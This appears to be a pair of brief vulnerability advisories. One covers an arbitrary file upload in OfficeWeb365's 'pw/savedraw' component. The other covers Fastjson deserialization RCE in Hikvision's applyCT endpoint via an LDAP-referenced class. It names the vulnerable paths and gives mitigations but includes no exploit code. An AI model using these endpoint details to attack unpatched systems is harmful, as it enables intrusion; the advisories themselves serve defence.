Peiqi0

**Name of the Vulnerable Software and Affected Versions** OfficeWeb365 versions 7.18.23.0 through 8.6.1.0 **Description** The issue allows a remote attacker to execute arbitrary code via the "pw/savedraw" component. This enables the attacker to upload files that can lead to code execution, potentially compromising the system. **Recommendations** For versions 7.18.23.0 through 8.6.1.0, consider disabling the "pw/savedraw" component to prevent file upload and subsequent code execution until a patch is available. Restrict access to the file upload functionality in the affected versions to minimize the risk of exploitation.

**Name of the Vulnerable Software and Affected Versions** Hikvision Integrated Security Management Platform (affected versions not specified) **Description** A critical issue exists in the applyCT component of the Hikvision Integrated Security Management Platform due to the use of a vulnerable version of the Fastjson library. The `/bic/ssoService/v1/applyCT` API endpoint deserializes untrusted user input, enabling an attacker to trigger Fastjson's auto-type feature and load arbitrary Java classes. By referencing a malicious class through an LDAP URL, an attacker can achieve remote code execution on the underlying system. The Shadowserver Foundation observed exploitation evidence on 2025-02-05 UTC. **Recommendations** At the moment, there is no information about a newer version that contains a fix for this vulnerability.